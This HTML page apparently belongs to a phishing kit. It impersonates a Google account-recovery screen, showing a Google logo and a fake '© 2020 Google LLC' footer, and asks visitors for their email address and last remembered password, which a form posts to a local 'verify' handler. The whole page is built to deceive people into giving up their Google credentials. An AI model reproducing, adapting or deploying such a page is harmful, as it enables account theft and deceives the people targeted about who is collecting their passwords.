<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Recover Your account</title>
    <link rel="stylesheet" href="css/styles.css">
  </head>
  <body>



<div class="important-form">
    <img class="ryaim" src="imagesgmail/google1.png" alt="">
    <h1 style="color: rgb(95, 83, 83); text-align: center; margin: 0; font-weight: 100;">Welcome</h1>

    <div class="recovery-form-amend" >
    <div class="notice verify">
        <p >To continue, first verify it's you</p>
      </div>

      <form class="verify-form"  action="verify" method="post">
     
        <div class="verify-email-imput">
          <input  class="text-input" type="email" name="email" placeholder="Enter your email" required autofocus>
        <!-- </div>
        <div class="verify-email-imput"> -->
          <p>Enter the last password you remember</p>
          <input  class="text-input" type="password" name="oldPassword" placeholder="Enter last password" required autofocus>
        </div> 

        
       <div style="">
          <button type="submit" class="btn btn-large btn-primary" href="new-password" >Next </button>

          <!-- <a type="submit" name="submit" href="new-password">Next</a> -->
        </div>
   
      </form>

     </div>  
</div>
<div class="copyright">
  <p>You received this email to let you know about important changes to your Google Account and services.
    © 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p>
</div>
</div>

  </body>
</html>
